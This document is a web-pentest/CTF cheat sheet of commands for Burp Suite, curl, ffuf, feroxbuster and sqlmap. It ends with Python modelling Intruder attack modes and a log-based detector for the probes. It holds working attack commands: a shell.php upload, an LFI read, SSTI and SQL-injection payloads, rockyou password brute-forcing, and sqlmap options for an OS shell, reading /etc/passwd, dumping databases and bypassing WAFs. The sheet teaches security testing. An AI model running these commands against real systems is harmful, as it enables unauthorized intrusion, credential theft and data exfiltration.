```bash
# Burp proxy: 127.0.0.1:8080 (default)
# Browser: set HTTP proxy to 127.0.0.1:8080
# Install CA cert: http://burpsuite (in browser via Burp)

# curl through Burp proxy
curl -x http://127.0.0.1:8080 -k https://target/
curl --proxy http://127.0.0.1:8080 --insecure https://target/

# Intercept toggle: Proxy → Intercept → On/Off
# Forward: forward button or Ctrl+F
# Drop request: drop button

# Scope: add target to scope
# Target → Scope → Add → paste URL
# Then: Proxy → Options → "intercept only in-scope"
```
```bash
# Repeater: replay/modify requests manually
# Right-click request → Send to Repeater (Ctrl+R)
# Modify → Send → see response

# Intruder: fuzzing/brute force
# Right-click → Send to Intruder (Ctrl+I)
# Positions tab: mark § payload positions §
# Attack types:
#   Sniper: one payload set, one position at a time
#   Battering Ram: same payload for all positions
#   Pitchfork: parallel payload sets per position
#   Cluster Bomb: all combinations (password spray)
# Payloads tab: add wordlist or simple list
# Options tab: set threads, timeout
# Sort results by status code or response length
# Different length = interesting response
```
```bash
# Decoder: Burp → Decoder tab
# Paste encoded data → decode as:
#   URL, HTML, Base64, Hex, Binary, Gzip, etc.
# Chain decodings (decode base64 → URL decode)

# Logger (Pro) / HTTP History
# Proxy → HTTP History → see all requests
# Filter by host, status code, method
# Search all history
# Proxy → HTTP History → right-click → Search

# Scanner (Pro): active scan for vulns
# Right-click request → Scan

# Comparer: diff two requests/responses
# Right-click → Send to Comparer
# Useful: compare auth vs unauth response
```
```bash
# GET request
curl https://target/path
curl -s https://target/    # silent (no progress)
curl -v https://target/    # verbose (headers)
curl -k https://target/    # skip cert verify

# POST with data
curl -X POST https://target/login \
  -d "user=admin&pass=1234"

# POST JSON
curl -X POST https://target/api \
  -H "Content-Type: application/json" \
  -d '{"user":"admin","pass":"1234"}'

# Custom headers
curl -H "Authorization: Bearer TOKEN" \
  -H "X-Admin: true" https://target/

# Upload file
curl -F "file=@shell.php" https://target/upload
```
```bash
# Send cookie
curl -b "session=abc123" https://target/
curl --cookie "session=abc123; admin=true" https://target/

# Save + send cookies (session handling)
curl -c cookies.txt https://target/login \
  -d "user=admin&pass=1234"
curl -b cookies.txt https://target/admin

# Basic auth
curl -u admin:password https://target/
curl -H "Authorization: Basic $(echo -n 'admin:pass' | base64)" \
  https://target/

# Follow redirects
curl -L https://target/

# Only show response headers
curl -I https://target/
curl -D - https://target/ -o /dev/null    # headers + discard body
```
```bash
# Read flag from LFI
curl -s "https://target/?file=../../../flag"

# Test SSTI
curl -s "https://target/?name={{7*7}}"

# Send raw bytes in POST
curl -X POST https://target/ \
  --data-binary $'\x00\x01\x02\x03'

# URL-encoded payload
curl -G https://target/search \
  --data-urlencode "q=' OR 1=1--"

# Get response code only
curl -o /dev/null -s -w "%{http_code}\n" https://target/admin

# Websocket (websocat is better, but basic)
curl --include --no-buffer \
  -H "Upgrade: websocket" \
  -H "Connection: Upgrade" https://target/ws
```
```bash
# Install: go install github.com/ffuf/ffuf/v2@latest

# Basic directory fuzzing
ffuf -u https://target/FUZZ \
  -w /usr/share/wordlists/dirb/common.txt

# With file extensions
ffuf -u https://target/FUZZ \
  -w /usr/share/wordlists/dirb/common.txt \
  -e .php,.html,.txt,.bak,.zip

# Filter by status code (exclude 404)
ffuf -u https://target/FUZZ -w words.txt \
  -fc 404                  # filter code 404
ffuf -u https://target/FUZZ -w words.txt \
  -mc 200,301,302          # match only these codes

# Filter by response size
ffuf -u https://target/FUZZ -w words.txt \
  -fs 4242                 # filter responses of size 4242
```
```bash
# GET parameter fuzzing
ffuf -u "https://target/search?q=FUZZ" -w payloads.txt

# POST parameter fuzzing
ffuf -u https://target/login \
  -X POST \
  -d "user=admin&pass=FUZZ" \
  -w /usr/share/wordlists/rockyou.txt \
  -fc 401

# Virtual host fuzzing
ffuf -u https://target/ \
  -H "Host: FUZZ.target.com" \
  -w subdomains.txt -fs 1234

# Header fuzzing
ffuf -u https://target/ \
  -H "X-Forwarded-For: FUZZ" \
  -w ips.txt

# Multiple positions (CLUSTERBOMB)
ffuf -u https://target/FUZZ1/FUZZ2 \
  -w words1.txt:FUZZ1 -w words2.txt:FUZZ2 \
  -mode clusterbomb
```
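The four Intruder attack types listed in the Burp section and ffuf's `-mode clusterbomb` differ only in how payload sets are spread across the marked positions. The Python model below is an added illustration (not Burp or ffuf code) using a constructed two-position login template; the number of requests each mode produces is what to weigh against a site's lockout and rate-limit thresholds.

```python
from itertools import product

# Constructed example: two marked positions and the base values Burp keeps
# in a position while it is not being attacked.
TEMPLATE = "user=§user§&pass=§pass§"
BASE = {"user": "admin", "pass": "1234"}
USERS = ["admin", "root", "guest"]   # payload set 1 (constructed)
PASSES = ["1234", "letmein"]         # payload set 2 (constructed)


def render(values: dict[str, str]) -> str:
    """Fill every §name§ marker in TEMPLATE with the given value."""
    body = TEMPLATE
    for name, val in values.items():
        body = body.replace(f"§{name}§", val)
    return body


def sniper(payloads: list[str]) -> list[str]:
    """One set, one position at a time: len(positions) * len(payloads) requests."""
    return [render({**BASE, pos: p}) for pos in BASE for p in payloads]


def battering_ram(payloads: list[str]) -> list[str]:
    """Same payload in every position at once: len(payloads) requests."""
    return [render({pos: p for pos in BASE}) for p in payloads]


def pitchfork(sets: dict[str, list[str]]) -> list[str]:
    """Parallel sets, i-th value of each set together: shortest set bounds the run."""
    names = list(sets)
    return [render(dict(zip(names, row))) for row in zip(*sets.values())]


def cluster_bomb(sets: dict[str, list[str]]) -> list[str]:
    """Every combination across sets (ffuf -mode clusterbomb): product of set sizes."""
    names = list(sets)
    return [render(dict(zip(names, combo))) for combo in product(*sets.values())]
```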
```bash
# Install: cargo install feroxbuster

# Basic recursive scan
feroxbuster -u https://target

# Custom wordlist
feroxbuster -u https://target \
  -w /usr/share/wordlists/dirb/common.txt

# Add extensions
feroxbuster -u https://target \
  -x php,html,txt,bak,zip,tar

# Limit recursion depth
feroxbuster -u https://target -d 2

# Threads
feroxbuster -u https://target -t 50

# Filter by status
feroxbuster -u https://target \
  -C 404,403               # filter these codes

# Save output
feroxbuster -u https://target \
  -o results.txt
```
| Path | Size | Use |
|---|---|---|
| /usr/share/wordlists/dirb/common.txt | ~4k | Quick recon |
| /usr/share/wordlists/dirb/big.txt | ~20k | Medium scan |
| /usr/share/dirbuster/directory-list-2.3-medium.txt | ~220k | Deep scan |
| SecLists/Discovery/Web-Content/raft-medium-words.txt | ~63k | Balanced CTF |
| SecLists/Discovery/Web-Content/api/objects.txt | small | API endpoints |
| SecLists/Passwords/rockyou.txt | 14M | Password brute |
```bash
# Get SecLists
git clone --depth 1 https://github.com/danielmiessler/SecLists
```
```bash
# Test URL parameter
sqlmap -u "http://target/page?id=1"

# Test + enumerate databases
sqlmap -u "http://target/?id=1" --dbs

# Enumerate tables in database
sqlmap -u "http://target/?id=1" -D mydb --tables

# Dump table
sqlmap -u "http://target/?id=1" \
  -D mydb -T users --dump

# Dump all databases
sqlmap -u "http://target/?id=1" --dump-all

# From Burp request file
sqlmap -r request.txt --dbs
# (Save raw request from Burp → Repeater → Save)
```
```bash
# Increase aggressiveness (find harder injections)
sqlmap -u "http://target/?id=1" \
  --level=5 --risk=3

# Test POST parameter
sqlmap -u https://target/login \
  --data "user=admin&pass=1234" \
  -p pass                  # target 'pass' parameter

# With cookies (authenticated scan)
sqlmap -u https://target/profile \
  --cookie "session=abc123" --dbs

# Force DB type
sqlmap -u "..." --dbms=mysql    # mysql|postgresql|sqlite|mssql

# Get OS shell (if stacked queries allowed)
sqlmap -u "..." --os-shell

# Read file
sqlmap -u "..." --file-read /etc/passwd
sqlmap -u "..." --file-read /flag

# Bypass WAF with tamper scripts
sqlmap -u "..." --tamper space2comment
sqlmap -u "..." --tamper between,randomcase
```
· curl: -s -v -k -L -b cookie -H header -d post -F file
· ffuf: -u URL/FUZZ -w wordlist -fc 404 -e .php,.txt
· ferox: recursive by default, add -x php,html -d 2 -C 403,404
· sqlmap: -u URL?param=1 --dbs then -D db -T table --dump
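Seen from the server side, the curl probes and wordlist scans on this sheet leave a recognisable footprint in access logs. The following Python is an added detection example (not part of the original page) that parses combined-format log lines, flags the payload shapes shown above (path traversal, `{{7*7}}`, `' OR 1=1--`) and reports clients whose spread of distinct 404 paths looks like an ffuf/feroxbuster run; the sample log lines and the 404 threshold are constructed assumptions.

```python
# Added detection example (not from the page); sample log lines are constructed.
import re
from collections import defaultdict
from urllib.parse import unquote

LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
PROBES = {  # matched against the URL-decoded request path + query string
    "path-traversal": re.compile(r"\.\./"),
    "ssti-probe": re.compile(r"\{\{.+\}\}"),
    "sqli-probe": re.compile(r"'\s*or\s+1=1", re.I),
}
FUZZ_404_THRESHOLD = 4  # distinct 404 paths per client; assumption, tune per site

SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /admin HTTP/1.1" 404 162
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /backup.zip HTTP/1.1" 404 162
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /config.php HTTP/1.1" 404 162
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /login.bak HTTP/1.1" 404 162
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?file=../../../flag HTTP/1.1" 200 33
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 55
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /search?q=%27%20OR%201%3D1-- HTTP/1.1" 500 0
10.0.0.7 - - [01/Jan/2024:10:00:08 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

def parse(line: str):
    """Return {ip, path, status} for a combined-format line, None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = unquote(rec["path"])  # decode %7B%7B7*7%7D%7D -> {{7*7}}
    rec["status"] = int(rec["status"])
    return rec

def analyze(log_text: str) -> list[tuple[str, str, str]]:
    """Return (client_ip, finding, detail) for payload probes and fuzzing volume."""
    findings, not_found = [], defaultdict(set)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        for name, rx in PROBES.items():
            if rx.search(rec["path"]):
                findings.append((rec["ip"], name, rec["path"]))
        if rec["status"] == 404:
            not_found[rec["ip"]].add(rec["path"])
    for ip, paths in not_found.items():  # many distinct 404s = wordlist scan footprint
        if len(paths) >= FUZZ_404_THRESHOLD:
            findings.append((ip, "dir-fuzzing", f"{len(paths)} distinct 404 paths"))
    return findings
```

Running `analyze(SAMPLE_LOG)` yields one finding per probe line from 10.0.0.9 plus a dir-fuzzing finding for 10.0.0.5, and nothing for the benign client.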